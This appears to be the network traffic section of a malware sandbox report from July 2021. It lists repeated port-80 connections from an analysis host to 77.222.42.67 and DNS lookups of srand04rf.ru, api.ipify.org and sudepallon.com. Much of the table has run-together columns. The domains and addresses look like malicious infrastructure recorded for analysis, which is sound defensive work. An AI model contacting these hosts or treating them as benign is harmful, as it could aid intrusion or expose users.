Jul 8, 2021 16:31:52.909492970 CEST  49756  80     192.168.2.3    23.21.173.155
Jul 8, 2021 16:31:53.009912968 CEST  80     49756  23.21.173.155  192.168.2.3
Jul 8, 2021 16:31:53.014983892 CEST  80     49756  23.21.173.155  192.168.2.3
Jul 8, 2021 16:31:53.015676975 CEST  49756  80     192.168.2.3    23.21.173.155
Jul 8, 2021 16:31:53.455985069 CEST  49757  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.508486986 CEST  80     49757  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:53.508682966 CEST  49757  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.509896040 CEST  49757  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.562050104 CEST  80     49757  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:53.576370001 CEST  80     49757  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:53.576657057 CEST  49757  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.837552071 CEST  49757  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.838788986 CEST  49758  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.890867949 CEST  80     49757  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:53.890990019 CEST  49757  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.895463943 CEST  80     49758  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:53.895596027 CEST  49758  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.896061897 CEST  49758  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:53.951288939 CEST  80     49758  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:53.964401007 CEST  80     49758  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:53.964476109 CEST  49758  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.288842916 CEST  49758  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.290414095 CEST  49759  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.342573881 CEST  80     49759  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:54.342725039 CEST  49759  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.343403101 CEST  80     49758  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:54.343494892 CEST  49758  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.344192028 CEST  49759  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.399554968 CEST  80     49759  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:54.414891005 CEST  80     49759  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:54.415044069 CEST  49759  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.681977034 CEST  49759  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.683125973 CEST  49760  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.735094070 CEST  80     49759  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:54.735234976 CEST  49759  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.741738081 CEST  80     49760  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:54.741916895 CEST  49760  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.742374897 CEST  49760  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:54.797066927 CEST  80     49760  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:54.810606956 CEST  80     49760  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:54.810722113 CEST  49760  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.121467113 CEST  49760  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.157277107 CEST  49761  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.175575018 CEST  80     49760  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:55.175817013 CEST  49760  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.210779905 CEST  80     49761  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:55.210972071 CEST  49761  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.212100029 CEST  49761  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.266644955 CEST  80     49761  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:55.280215025 CEST  80     49761  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:55.280299902 CEST  49761  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.595057964 CEST  49761  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.596245050 CEST  49762  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.648663998 CEST  80     49762  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:55.648700953 CEST  80     49761  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:55.648844004 CEST  49762  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.648901939 CEST  49761  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.649635077 CEST  49762  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:55.705270052 CEST  80     49762  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:55.718817949 CEST  80     49762  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:55.718924046 CEST  49762  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:56.047828913 CEST  49762  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:56.048923016 CEST  49763  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:56.100528002 CEST  80     49762  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:56.100655079 CEST  49762  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:56.100781918 CEST  80     49763  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:56.100895882 CEST  49763  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:56.101624966 CEST  49763  80     192.168.2.3    77.222.42.67
Jul 8, 2021 16:31:56.153831005 CEST  80     49763  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:56.167244911 CEST  80     49763  77.222.42.67   192.168.2.3
Jul 8, 2021 16:31:56.167309999 CEST  49763  80     192.168.2.3    77.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.462718964 CEST4976380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.463892937 CEST4976480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.515014887 CEST804976377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:56.517419100 CEST804976477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:56.517426968 CEST4976380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.517566919 CEST4976480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.518250942 CEST4976480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.571727037 CEST804976477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:56.586610079 CEST804976477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:56.586730957 CEST4976480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.881628036 CEST4976480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.882698059 CEST4976580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.937570095 CEST804976477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:56.937666893 CEST4976480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.938061953 CEST804976577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:56.938211918 CEST4976580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.938754082 CEST4976580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:56.996032953 CEST804976577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.006598949 CEST804976577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.006727934 CEST4976580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.278409004 CEST4976580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.281435013 CEST4976680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.335228920 CEST804976577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.335426092 CEST4976580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.338043928 CEST804976677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.338202953 CEST4976680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.339512110 CEST4976680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.400495052 CEST804976677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.414515972 CEST804976677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.414597034 CEST4976680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.701199055 CEST4976680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.703130007 CEST4976780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.754807949 CEST804976677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.754920959 CEST4976680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.756669044 CEST804976777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.756810904 CEST4976780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.757333994 CEST4976780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:57.810981035 CEST804976777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.826961040 CEST804976777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:57.827158928 CEST4976780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.149115086 CEST4976780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.150883913 CEST4976880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.203788996 CEST804976877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:58.203844070 CEST804976777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:58.203933954 CEST4976880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.204026937 CEST4976780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.204698086 CEST4976880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.261022091 CEST804976877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:58.276258945 CEST804976877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:58.276411057 CEST4976880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.550275087 CEST4976880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.551739931 CEST4976980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.605460882 CEST804976877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:58.605604887 CEST4976880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.605973005 CEST804976977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:58.606487989 CEST4976980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.606812954 CEST4976980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.662637949 CEST804976977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:58.675935984 CEST804976977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:58.676423073 CEST4976980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.958802938 CEST4976980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:58.959945917 CEST4977080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.014137983 CEST804976977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.014312983 CEST4976980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.017595053 CEST804977077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.017712116 CEST4977080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.018161058 CEST4977080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.076133966 CEST804977077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.090984106 CEST804977077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.092170954 CEST4977080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.354614973 CEST4977080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.356451988 CEST4977180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.415208101 CEST804977077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.415229082 CEST804977177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.415292978 CEST4977080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.415406942 CEST4977180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.415894985 CEST4977180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.476728916 CEST804977177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.487183094 CEST804977177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.487282991 CEST4977180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.746815920 CEST4977180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.748593092 CEST4977280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.801007032 CEST804977277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.801104069 CEST4977280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.801417112 CEST804977177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.801495075 CEST4977180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.801717997 CEST4977280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:31:59.854208946 CEST804977277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.868599892 CEST804977277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:59.868693113 CEST4977280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.148339033 CEST4977280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.153064013 CEST4977380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.200778008 CEST804977277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:00.200882912 CEST4977280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.206937075 CEST804977377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:00.207091093 CEST4977380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.207560062 CEST4977380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.260294914 CEST804977377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:00.276813984 CEST804977377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:00.276968956 CEST4977380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.554563999 CEST4977380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.558147907 CEST4977480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.608493090 CEST804977377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:00.608628988 CEST4977380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.612857103 CEST804977477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:00.613015890 CEST4977480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.613718033 CEST4977480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.667288065 CEST804977477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:00.681197882 CEST804977477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:00.681334019 CEST4977480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.961185932 CEST4977480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:00.962620974 CEST4977580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.017819881 CEST804977577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:01.017853975 CEST804977477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:01.018009901 CEST4977480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.018498898 CEST4977580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.018528938 CEST4977580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.074443102 CEST804977577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:01.088430882 CEST804977577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:01.088665962 CEST4977580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.381861925 CEST4977580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.383167028 CEST4977680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.434052944 CEST804977577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:01.434288025 CEST4977580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.436960936 CEST804977677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:01.437269926 CEST4977680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.437737942 CEST4977680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.491204977 CEST804977677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:01.505616903 CEST804977677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:01.505695105 CEST4977680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:01.778621912 CEST4977680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.657682896 CEST804979377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.657763958 CEST4979380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.661021948 CEST804979477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.661123991 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.661709070 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.716578007 CEST804979477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.730118990 CEST804979477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.730317116 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.990187883 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.002593994 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.046655893 CEST804979477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.046801090 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.058552027 CEST804979577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.058734894 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.059182882 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.114506960 CEST804979577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.127449989 CEST804979577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.127593994 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.377461910 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.380247116 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.431025028 CEST804979577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.431195021 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.432945967 CEST804979677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.433163881 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.434488058 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.487174988 CEST804979677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.502567053 CEST804979677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.502739906 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.742090940 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.743561983 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.794579983 CEST804979677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.794795990 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.796081066 CEST804979777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.796235085 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.798916101 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.851476908 CEST804979777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.867554903 CEST804979777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.867810011 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:11.100192070 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:11.101713896 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:11.154808998 CEST804979777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:11.154975891 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.559669971 CEST804979877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.562772036 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.563224077 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.617768049 CEST804979877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.632021904 CEST804979877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.634275913 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.885900021 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.887197971 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.939713955 CEST804979977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.939743042 CEST804979877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.941365004 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.942588091 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.942617893 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.994925022 CEST804979977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.008268118 CEST804979977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.010777950 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.262774944 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.264075041 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.315301895 CEST804979977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.315639973 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.319425106 CEST804980077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.319683075 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.320719004 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.375287056 CEST804980077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.388214111 CEST804980077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.388403893 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.632649899 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.634596109 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.687375069 CEST804980077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.687539101 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.689146042 CEST804980177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.689290047 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.690525055 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.748176098 CEST804980177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.764219046 CEST804980177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.765355110 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.021364927 CEST4980280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.021368980 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.075417042 CEST804980277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:14.075612068 CEST4980280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.077658892 CEST804980177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:14.077763081 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.084805965 CEST4980280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.139041901 CEST804980277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:14.151746035 CEST804980277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:14.153836012 CEST4980280192.168.2.377.222.42.67

UDP Packets

Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                  Jul 8, 2021 16:31:53.451231003 CEST53639788.8.8.8192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 8, 2021 16:30:09.381835938 CEST | 192.168.2.3 | 8.8.8.8 | 0xdd4d | Standard query (0) | srand04rf.ru | A (IP address) | IN (0x0001)
Jul 8, 2021 16:30:57.862971067 CEST | 192.168.2.3 | 8.8.8.8 | 0x7e19 | Standard query (0) | srand04rf.ru | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.775281906 CEST | 192.168.2.3 | 8.8.8.8 | 0xdfcb | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:53.091214895 CEST | 192.168.2.3 | 8.8.8.8 | 0x6ae3 | Standard query (0) | sudepallon.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 8, 2021 16:30:09.690469027 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd4d | No error (0) | srand04rf.ru | - | 8.211.241.0 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:30:58.155386925 CEST | 8.8.8.8 | 192.168.2.3 | 0x7e19 | No error (0) | srand04rf.ru | - | 8.211.241.0 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | api.ipify.org | nagano-19599.herokussl.com | - | CNAME (Canonical name) | IN (0x0001)
